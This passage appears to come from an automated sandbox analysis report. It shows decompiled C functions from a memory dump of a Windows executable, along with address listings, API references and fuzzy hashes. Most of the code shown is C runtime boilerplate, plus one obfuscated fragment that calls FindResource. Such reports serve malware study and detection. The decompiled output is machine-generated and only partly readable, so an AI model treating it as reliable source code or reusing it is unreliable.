                  				if(_t1797 < 0x3661b39c) {
                  					goto L7;
                  				} else {
                  				}
                  				goto L17;
                  			}






































































































































































































                  0x0044d420
                  0x0044d429
                  0x0044d430
                  0x0044d433
                  0x0044d43a
                  0x0044d443
                  0x0044d448
                  0x0044d448
                  0x0044d450
                  0x0044d456
                  0x0044d458
                  0x0044d458
                  0x0044d464
                  0x0044d46f
                  0x0044d46f
                  0x0044d471
                  0x0044d472
                  0x0044d47a
                  0x0044d486
                  0x00000000
                  0x0044d490
                  0x0044d497
                  0x0044d49d
                  0x0044d49d
                  0x0044d4a3
                  0x0044d4ab
                  0x00000000
                  0x00000000
                  0x0044d4d6
                  0x0044d4e1
                  0x0044d4e1
                  0x0044d4e7
                  0x0044d4f1
                  0x0044d4fb
                  0x0044d505
                  0x0044d50f
                  0x0044d519
                  0x0044d523
                  0x0044d52d
                  0x0044d537
                  0x0044d541
                  0x0044d54b
                  0x0044d555
                  0x0044d55f
                  0x0044d569
                  0x0044d573
                  0x0044d57d
                  0x0044d587
                  0x0044d591
                  0x0044d59b
                  0x0044d5a5
                  0x0044d5af
                  0x0044d5b9
                  0x0044d5c3
                  0x0044d5cd
                  0x0044d5d7
                  0x0044d5e1
                  0x0044d5eb
                  0x0044d5f5
                  0x0044d5ff
                  0x0044d609
                  0x0044d613
                  0x0044d61d
                  0x0044d627
                  0x0044d631
                  0x0044d63b
                  0x0044d645
                  0x0044d64f
                  0x0044d659
                  0x0044d663
                  0x0044d66d
                  0x0044d677
                  0x0044d681
                  0x0044d68b
                  0x0044d695
                  0x0044d69f
                  0x0044d6a9
                  0x0044d6b3
                  0x0044d6bd
                  0x0044d6c7
                  0x0044d6d1
                  0x0044d6db
                  0x0044d6e5
                  0x0044d6ef
                  0x0044d6f9
                  0x0044d703
                  0x0044d70d
                  0x0044d717
                  0x0044d721
                  0x0044d72b
                  0x0044d735
                  0x0044d73f
                  0x0044d749
                  0x0044d753
                  0x0044d75d
                  0x0044d767
                  0x0044d771
                  0x0044d77b
                  0x0044d785
                  0x0044d78f
                  0x0044d799
                  0x0044d7a3
                  0x0044d7ad
                  0x0044d7b7
                  0x0044d7c1
                  0x0044d7cb
                  0x0044d7d5
                  0x0044d7df
                  0x0044d7e9
                  0x0044d7f3
                  0x0044d7fd
                  0x0044d807
                  0x0044d811
                  0x0044d81b
                  0x0044d825
                  0x0044d82f
                  0x0044d839
                  0x0044d843
                  0x0044d84d
                  0x0044d857
                  0x0044d861
                  0x0044d86b
                  0x0044d875
                  0x0044d87f
                  0x0044d889
                  0x0044d893
                  0x0044d89d
                  0x0044d8a7
                  0x0044d8b1
                  0x0044d8bb
                  0x0044d8c5
                  0x0044d8cf
                  0x0044d8d9
                  0x0044d8e3
                  0x0044d8ed
                  0x0044d8f7
                  0x0044d901
                  0x0044d90b
                  0x0044d915
                  0x0044d91f
                  0x0044d929
                  0x0044d933
                  0x0044d93d
                  0x0044d947
                  0x0044d951
                  0x0044d95b
                  0x0044d965
                  0x0044d96f
                  0x0044d979
                  0x0044d983
                  0x0044d98d
                  0x0044d997
                  0x0044d9a1
                  0x0044d9ab
                  0x0044d9b5
                  0x0044d9bf
                  0x0044d9c9
                  0x0044d9d3
                  0x0044d9dd
                  0x0044d9e7
                  0x0044d9f1
                  0x0044d9fb
                  0x0044da05
                  0x0044da0f
                  0x0044da19
                  0x0044da23
                  0x0044da2d
                  0x0044da37
                  0x0044da41
                  0x0044da4b
                  0x0044da55
                  0x0044da5f
                  0x0044da69
                  0x0044da73
                  0x0044da7d
                  0x0044da87
                  0x0044da91
                  0x0044da9b
                  0x0044daa5
                  0x0044daaf
                  0x0044dab9
                  0x0044dac3
                  0x0044dacd
                  0x0044dad7
                  0x0044dae1
                  0x0044daeb
                  0x0044daf5
                  0x0044daff
                  0x0044db09
                  0x0044db13
                  0x0044db1d
                  0x0044db27
                  0x0044db31
                  0x0044db3b
                  0x0044db45
                  0x0044db4f
                  0x0044db59
                  0x0044db63
                  0x0044db6d
                  0x0044db77
                  0x0044db81
                  0x0044db8b
                  0x0044db95
                  0x0044db9f
                  0x0044dba9
                  0x0044dbb3
                  0x0044dbbd
                  0x0044dbc7
                  0x0044dbd1
                  0x0044dbdb
                  0x0044dbe5
                  0x0044dbef
                  0x0044dbf9
                  0x0044dc03
                  0x0044dc0d
                  0x0044dc17
                  0x0044dc87
                  0x0044dca2
                  0x0044dcac
                  0x0044dcb6
                  0x0044dcc0
                  0x0044dcca
                  0x0044dcd4
                  0x0044dcde
                  0x0044dcf9
                  0x0044dd03
                  0x0044dd0d
                  0x0044dd28
                  0x0044dd54
                  0x0044dd5e
                  0x0044dd68
                  0x0044dd72
                  0x0044dd9e
                  0x0044dda8
                  0x0044ddd4
                  0x0044ddde
                  0x0044ddf9
                  0x0044de03
                  0x0044de0d
                  0x0044de17
                  0x0044de32
                  0x0044de4d
                  0x0044de9b
                  0x0044dea5
                  0x0044deaf
                  0x0044deca
                  0x0044dee5
                  0x0044deef
                  0x0044def9
                  0x0044df03
                  0x0044df0d
                  0x0044df28
                  0x0044df32
                  0x0044df3c
                  0x0044df68
                  0x0044df72
                  0x0044df7c
                  0x0044dfb9
                  0x0044dfc3
                  0x0044dfcd
                  0x0044dff9
                  0x0044e003
                  0x0044e00d
                  0x0044e017
                  0x0044e021
                  0x0044e02b
                  0x0044e035
                  0x0044e050
                  0x0044e05a
                  0x0044e064
                  0x0044e07f
                  0x0044e09a
                  0x0044e0a4
                  0x0044e0ae
                  0x0044e0b8
                  0x0044e0f5
                  0x0044e110
                  0x0044e12b
                  0x0044e135
                  0x0044e161
                  0x0044e18d
                  0x0044e197
                  0x0044e1a1
                  0x0044e1ab
                  0x0044e1b5
                  0x0044e1bf
                  0x0044e1da
                  0x0044e1e4
                  0x0044e1ee
                  0x0044e24d
                  0x0044e257
                  0x0044e272
                  0x0044e27c
                  0x0044e286
                  0x0044e290
                  0x0044e29a
                  0x0044e2a4
                  0x0044e2ae
                  0x0044e2b8
                  0x0044e2c2
                  0x0044e2cc
                  0x0044e2d6
                  0x0044e2f1
                  0x0044e2fb
                  0x0044e305
                  0x0044e30f
                  0x0044e319
                  0x0044e334
                  0x0044e360
                  0x0044e37b
                  0x0044e385
                  0x0044e38f
                  0x0044e399
                  0x0044e3a3
                  0x0044e3ad
                  0x0044e3c8
                  0x0044e3e3
                  0x0044e3ed
                  0x0044e3f7
                  0x0044e401
                  0x0044e40b
                  0x0044e448
                  0x0044e452
                  0x0044e45c
                  0x0044e466
                  0x0044e492
                  0x0044e49c
                  0x0044e4a6
                  0x0044e4b0
                  0x0044e4ba
                  0x0044e4c4
                  0x0044e4f0
                  0x0044e4fa
                  0x0044e515
                  0x0044e51f
                  0x0044e529
                  0x0044e5aa
                  0x0044e5c5
                  0x0044e602
                  0x0044e60c
                  0x0044e616
                  0x0044e642
                  0x0044e64c
                  0x0044e656
                  0x0044e660
                  0x0044e66a
                  0x0044e685
                  0x0044e68f
                  0x0044e699
                  0x0044e6a3
                  0x0044e6be
                  0x0044e6c8
                  0x0044e6e3
                  0x0044e6ed
                  0x0044e6f7
                  0x0044e701
                  0x0044e70b
                  0x0044e715
                  0x0044e71f
                  0x0044e729
                  0x0044e744
                  0x0044e74e
                  0x0044e758
                  0x0044e762
                  0x0044e77d
                  0x0044e787
                  0x0044e791
                  0x0044e7ac
                  0x0044e7c7
                  0x0044e7e2
                  0x0044e7ec
                  0x0044e7f6
                  0x0044e800
                  0x0044e81b
                  0x0044e836
                  0x0044e851
                  0x0044e85b
                  0x0044e865
                  0x0044e86f
                  0x0044e879
                  0x0044e883
                  0x0044e88d
                  0x0044e8b9
                  0x0044e8c3
                  0x0044e8cd
                  0x0044e8e8
                  0x0044e8f2
                  0x0044e8fc
                  0x0044e906
                  0x0044e910
                  0x0044e92b
                  0x0044e935
                  0x0044e93f
                  0x0044e949
                  0x0044e953
                  0x0044e95d
                  0x0044e967
                  0x0044e971
                  0x0044e97b
                  0x0044e985
                  0x0044e98f
                  0x0044e9aa
                  0x0044e9c5
                  0x0044e9e0
                  0x0044e9ea
                  0x0044e9f4
                  0x0044e9fe
                  0x0044ea08
                  0x0044ea12
                  0x0044ea1c
                  0x0044ea26
                  0x0044ea30
                  0x0044ea3a
                  0x0044ea55
                  0x0044ea5f
                  0x0044ea69
                  0x0044ea95
                  0x0044ea9f
                  0x0044eaba
                  0x0044ead5
                  0x0044eaf0
                  0x0044eafa
                  0x0044eb04
                  0x0044eb13
                  0x0044eb1f
                  0x0044eb29
                  0x0044eb33
                  0x0044eb3d
                  0x0044eb47
                  0x0044eb4d
                  0x0044eb50
                  0x0044eb56
                  0x0044eb58
                  0x0044eb5d
                  0x0044eb5d
                  0x0044eb69
                  0x0044eb71
                  0x0044eb71
                  0x0044eb73
                  0x0044eb74
                  0x0044eb7c
                  0x0044eb88
                  0x0044eb89
                  0x0044eb8a
                  0x0044eb8b
                  0x0044eb95
                  0x0044eb9b
                  0x0044eba5
                  0x0044eba5
                  0x0044ebbe
                  0x0044d4c1
                  0x0044d4c1
                  0x0044d4c8
                  0x00000000
                  0x00000000
                  0x0044d4ca
                  0x00000000

                  APIs
                  • lstrcpyW.KERNEL32 ref: 0044D46F
                  • SetConsoleTextAttribute.KERNEL32(00000000,00000000), ref: 0044D49D
                  • GetLastError.KERNEL32 ref: 0044D4A3
                  • FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 0044EB71
                  • FindResourceExW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044EB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: FindResource$AttributeConsoleErrorLastTextlstrcpy
                  • String ID: ;a$W$}$rh$6fL$ ?: $&8Z\$&on+$,qkN$-R^$29ws$3xm,$6VNm$@)S$BUsf$D&73$NUpV$O^a'$Tem$[>"T$a^Ze$c^cF$d3L{$eG:i$jCV]$o.`$v4Q3$xl_$~7]$7^U$X `$cB$e%{$rI$sI
                  • API String ID: 1504342148-1630852067
                  • Opcode ID: 82cd14788d8f1562def75839d789b28c4bd09bd65779f87903080d73cb57a6a7
                  • Instruction ID: 678a56bc0feb13c3e675f3174814d9e113a3e58f8e8ad76f3fc5e03a3e86f747
                  • Opcode Fuzzy Hash: 82cd14788d8f1562def75839d789b28c4bd09bd65779f87903080d73cb57a6a7
                  • Instruction Fuzzy Hash: 21C2BDB5E02369CBEBA48F1AC98579DF7B0BB16314F5481C9D44D6AA12CB309EC1CF46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040B49D() {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				WCHAR* _t1;
                  				void* _t5;
                  				void* _t18;
                  				WCHAR* _t20;
                  
                  				_t1 = GetEnvironmentStringsW();
                  				_t20 = _t1;
                  				if(_t20 != 0) {
                  					if( *_t20 != 0) {
                  						goto L3;
                  						do {
                  							do {
                  								L3:
                  								_t1 =  &(_t1[1]);
                  							} while ( *_t1 != 0);
                  							_t1 =  &(_t1[1]);
                  						} while ( *_t1 != 0);
                  					}
                  					_t13 = _t1 - _t20 + 2;
                  					_t5 = E00406CDA(_t1 - _t20 + 2); // executed
                  					_t18 = _t5;
                  					if(_t18 != 0) {
                  						E0040A5C0(_t13, _t18, _t20, _t18, _t20, _t13);
                  					}
                  					FreeEnvironmentStringsW(_t20);
                  					return _t18;
                  				} else {
                  					return 0;
                  				}
                  			}










                  0x0040b4a0
                  0x0040b4a6
                  0x0040b4ac
                  0x0040b4b5
                  0x00000000
                  0x0040b4b7
                  0x0040b4b7
                  0x0040b4b7
                  0x0040b4b8
                  0x0040b4b9
                  0x0040b4bf
                  0x0040b4c0
                  0x0040b4b7
                  0x0040b4ca
                  0x0040b4ce
                  0x0040b4d3
                  0x0040b4d8
                  0x0040b4ea
                  0x0040b4ef
                  0x0040b4db
                  0x0040b4e6
                  0x0040b4ae
                  0x0040b4b1
                  0x0040b4b1

                  APIs
                  • GetEnvironmentStringsW.KERNEL32(00000000,00402EE2), ref: 0040B4A0
                  • __malloc_crt.LIBCMT ref: 0040B4CE
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040B4DB
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: EnvironmentStrings$Free__malloc_crt
                  • String ID:
                  • API String ID: 237123855-0
                  • Opcode ID: 5d089b9637f73c897f2aab298f142f6db1b1887cb12ec00e205e8a8e481efc50
                  • Instruction ID: 0b88178ae0eafc877dd8b3f9d99c71b0064c159633a81baf3373b3dbcac13a0e
                  • Opcode Fuzzy Hash: 5d089b9637f73c897f2aab298f142f6db1b1887cb12ec00e205e8a8e481efc50
                  • Instruction Fuzzy Hash: 79F082366141216EDA2176756C4887B1668DAD6329316883BF9A6E3282F73C4E8342ED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040B7EC(intOrPtr _a4) {
                  				void* _t6;
                  
                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                  				 *0x451064 = _t6;
                  				if(_t6 != 0) {
                  					 *0x477ae0 = 1;
                  					return 1;
                  				} else {
                  					return _t6;
                  				}
                  			}




                  0x0040b801
                  0x0040b807
                  0x0040b80e
                  0x0040b815
                  0x0040b81b
                  0x0040b811
                  0x0040b811
                  0x0040b811

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040B801
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 1da2d312b305f5ab6f0535fdbe77f7d377475ebadb6e435b4f47102c4b62afdb
                  • Instruction ID: eba4c41ffdfcecbf94b759f0d18a4aac9601aab7ac9ab40ed87857c2f36acec8
                  • Opcode Fuzzy Hash: 1da2d312b305f5ab6f0535fdbe77f7d377475ebadb6e435b4f47102c4b62afdb
                  • Instruction Fuzzy Hash: 4ED05E729543485AEB009F746C097673BDCD384795F108436F90DC66A0E774C980D588
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004066BD() {
                  				void* _t1;
                  
                  				_t1 = E0040664B(0); // executed
                  				return _t1;
                  			}




                  0x004066bf
                  0x004066c5

                  APIs
                  • __encode_pointer.LIBCMT ref: 004066BF
                    • Part of subcall function 0040664B: TlsGetValue.KERNEL32(00000000,?,004066C4,00000000,0041B4C4,00450B40,00000000,00000314,?,0040AF1A,00450B40,Microsoft Visual C++ Runtime Library,00012010), ref: 0040665D
                    • Part of subcall function 0040664B: TlsGetValue.KERNEL32(00000001,?,004066C4,00000000,0041B4C4,00450B40,00000000,00000314,?,0040AF1A,00450B40,Microsoft Visual C++ Runtime Library,00012010), ref: 00406674
                    • Part of subcall function 0040664B: RtlEncodePointer.NTDLL(00000000,?,004066C4,00000000,0041B4C4,00450B40,00000000,00000314,?,0040AF1A,00450B40,Microsoft Visual C++ Runtime Library,00012010), ref: 004066B2
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction ID: bb74eaa002715f722a62abd881ac9de8af5e52d2c93518fcaa464a8ac363a2c9
                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 100%
                  			E0041C1B6(signed int __eax, void* __esi) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v20;
                  				signed int _t142;
                  				signed int _t145;
                  				signed int _t148;
                  				signed int _t151;
                  				signed int _t154;
                  				signed int _t157;
                  				signed int _t159;
                  				signed int _t162;
                  				signed int _t165;
                  				signed int _t168;
                  				signed int _t171;
                  				signed int _t174;
                  				signed int _t177;
                  				signed int _t180;
                  				signed int _t183;
                  				signed int _t186;
                  				signed int _t189;
                  				signed int _t192;
                  				signed int _t195;
                  				signed int _t198;
                  				signed int _t201;
                  				signed int _t204;
                  				signed int _t207;
                  				signed int _t210;
                  				signed int _t213;
                  				signed int _t216;
                  				signed int _t219;
                  				signed int _t222;
                  				signed int _t225;
                  				signed int _t228;
                  				signed int _t231;
                  				signed int _t234;
                  				signed int _t237;
                  				signed int _t240;
                  				signed int _t243;
                  				signed int _t246;
                  				signed int _t249;
                  				signed int _t252;
                  				signed int _t255;
                  				signed int _t258;
                  				signed int _t261;
                  				signed int _t264;
                  				signed int _t267;
                  				signed int _t270;
                  				signed int _t276;
                  
                  				_t278 =  *(__eax + 0x42) & 0x0000ffff;
                  				_t279 =  *(__eax + 0x44) & 0x0000ffff;
                  				_v8 =  *(__eax + 0x42) & 0x0000ffff;
                  				_v12 =  *(__eax + 0x44) & 0x0000ffff;
                  				if(__esi != 0) {
                  					_v16 = _v16 & 0x00000000;
                  					_v20 = __eax;
                  					_t142 = E004113CD(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
                  					_t145 = E004113CD(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
                  					_t148 = E004113CD(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
                  					_t151 = E004113CD(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
                  					_t154 = E004113CD(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
                  					_t157 = E004113CD(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
                  					_t159 = E004113CD(_t279,  &_v20, 1, _v8, 0x37, __esi);
                  					_t162 = E004113CD(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
                  					_t165 = E004113CD(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
                  					_t168 = E004113CD(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
                  					_t171 = E004113CD(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
                  					_t174 = E004113CD(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
                  					_t177 = E004113CD(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
                  					_t180 = E004113CD(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
                  					_t183 = E004113CD(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
                  					_t186 = E004113CD(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
                  					_t189 = E004113CD(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
                  					_t192 = E004113CD(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
                  					_t195 = E004113CD(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
                  					_t198 = E004113CD(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
                  					_t201 = E004113CD(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
                  					_t204 = E004113CD(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
                  					_t207 = E004113CD(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
                  					_t210 = E004113CD(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
                  					_t213 = E004113CD(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
                  					_t216 = E004113CD(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
                  					_t219 = E004113CD(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
                  					_t222 = E004113CD(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
                  					_t225 = E004113CD(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
                  					_t228 = E004113CD(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
                  					_t231 = E004113CD(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
                  					_t234 = E004113CD(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
                  					_t237 = E004113CD(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
                  					_t240 = E004113CD(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
                  					_t243 = E004113CD(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
                  					_t246 = E004113CD(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
                  					_t249 = E004113CD(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
                  					_t252 = E004113CD(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
                  					_t255 = E004113CD(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
                  					_t258 = E004113CD(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
                  					_t261 = E004113CD(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
                  					_t264 = E004113CD(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
                  					_t267 = E004113CD(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
                  					_t276 = _v12;
                  					_t270 = E004113CD(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
                  					 *(__esi + 0xac) = _t276;
                  					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
                  				} else {
                  					return __eax | 0xffffffff;
                  				}
                  			}




















































                  0x0041c1be
                  0x0041c1c2
                  0x0041c1c6
                  0x0041c1c9
                  0x0041c1ce
                  0x0041c1d5
                  0x0041c1db
                  0x0041c1ed
                  0x0041c202
                  0x0041c217
                  0x0041c22c
                  0x0041c244
                  0x0041c259
                  0x0041c26b
                  0x0041c280
                  0x0041c298
                  0x0041c2ad
                  0x0041c2c2
                  0x0041c2d7
                  0x0041c2ef
                  0x0041c304
                  0x0041c319
                  0x0041c32e
                  0x0041c346
                  0x0041c35b
                  0x0041c370
                  0x0041c385
                  0x0041c39d
                  0x0041c3b2
                  0x0041c3c7
                  0x0041c3dc
                  0x0041c3f4
                  0x0041c409
                  0x0041c41e
                  0x0041c433
                  0x0041c44b
                  0x0041c460
                  0x0041c475
                  0x0041c48a
                  0x0041c4a5
                  0x0041c4bd
                  0x0041c4d5
                  0x0041c4ed
                  0x0041c508
                  0x0041c520
                  0x0041c538
                  0x0041c550
                  0x0041c56b
                  0x0041c583
                  0x0041c59e
                  0x0041c5b1
                  0x0041c5bb
                  0x0041c5c8
                  0x0041c5d0
                  0x0041c1d0
                  0x0041c1d4
                  0x0041c1d4

                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ___getlocaleinfo
                  • String ID:
                  • API String ID: 1937885557-0
                  • Opcode ID: eeb3a2f53ef9cdb8a56b0496cffd97dcf9148b706d6982ce29c976e1b46872ee
                  • Instruction ID: 635302dd4953757cb4892d6e7891d79906223aa160e535d2bfe3280599565fbc
                  • Opcode Fuzzy Hash: eeb3a2f53ef9cdb8a56b0496cffd97dcf9148b706d6982ce29c976e1b46872ee
                  • Instruction Fuzzy Hash: 40E1ECB290025DBEFB11DBE1CC85EFFB7FDEB04348F10092BB615A2450EA74AA159760
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E004020C8(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                  				intOrPtr _v0;
                  				void* _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _t6;
                  				intOrPtr _t11;
                  				intOrPtr _t12;
                  				intOrPtr _t13;
                  				long _t17;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				intOrPtr _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr* _t31;
                  				void* _t34;
                  
                  				_t27 = __esi;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ecx;
                  				_t21 = __ebx;
                  				_t6 = __eax;
                  				_t34 = _t22 -  *0x44f0d4; // 0x45b66027
                  				if(_t34 == 0) {
                  					asm("repe ret");
                  				}
                  				 *0x4508c8 = _t6;
                  				 *0x4508c4 = _t22;
                  				 *0x4508c0 = _t25;
                  				 *0x4508bc = _t21;
                  				 *0x4508b8 = _t27;
                  				 *0x4508b4 = _t26;
                  				 *0x4508e0 = ss;
                  				 *0x4508d4 = cs;
                  				 *0x4508b0 = ds;
                  				 *0x4508ac = es;
                  				 *0x4508a8 = fs;
                  				 *0x4508a4 = gs;
                  				asm("pushfd");
                  				_pop( *0x4508d8);
                  				 *0x4508cc =  *_t31;
                  				 *0x4508d0 = _v0;
                  				 *0x4508dc =  &_a4;
                  				 *0x450818 = 0x10001;
                  				_t11 =  *0x4508d0; // 0x0
                  				 *0x4507cc = _t11;
                  				 *0x4507c0 = 0xc0000409;
                  				 *0x4507c4 = 1;
                  				_t12 =  *0x44f0d4; // 0x45b66027
                  				_v812 = _t12;
                  				_t13 =  *0x44f0d8; // 0xba499fd8
                  				_v808 = _t13;
                  				 *0x450810 = IsDebuggerPresent();
                  				_push(1);
                  				E0040CBFC(_t14);
                  				SetUnhandledExceptionFilter(0);
                  				_t17 = UnhandledExceptionFilter(0x47b310);
                  				if( *0x450810 == 0) {
                  					_push(1);
                  					E0040CBFC(_t17);
                  				}
                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                  			}



















                  0x004020c8
                  0x004020c8
                  0x004020c8
                  0x004020c8
                  0x004020c8
                  0x004020c8
                  0x004020c8
                  0x004020ce
                  0x004020d0
                  0x004020d0
                  0x00403516
                  0x0040351b
                  0x00403521
                  0x00403527
                  0x0040352d
                  0x00403533
                  0x00403539
                  0x00403540
                  0x00403547
                  0x0040354e
                  0x00403555
                  0x0040355c
                  0x00403563
                  0x00403564
                  0x0040356d
                  0x00403575
                  0x0040357d
                  0x00403588
                  0x00403592
                  0x00403597
                  0x0040359c
                  0x004035a6
                  0x004035b0
                  0x004035b5
                  0x004035bb
                  0x004035c0
                  0x004035cc
                  0x004035d1
                  0x004035d3
                  0x004035db
                  0x004035e6
                  0x004035f3
                  0x004035f5
                  0x004035f7
                  0x004035fc
                  0x00403610

                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 004035C6
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004035DB
                  • UnhandledExceptionFilter.KERNEL32(0047B310), ref: 004035E6
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00403602
                  • TerminateProcess.KERNEL32(00000000), ref: 00403609
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID:
                  • API String ID: 2579439406-0
                  • Opcode ID: 79554be0986bbfc098f73cd10f4684f9fcf3f170b892e3214e1fab69c80ac2b7
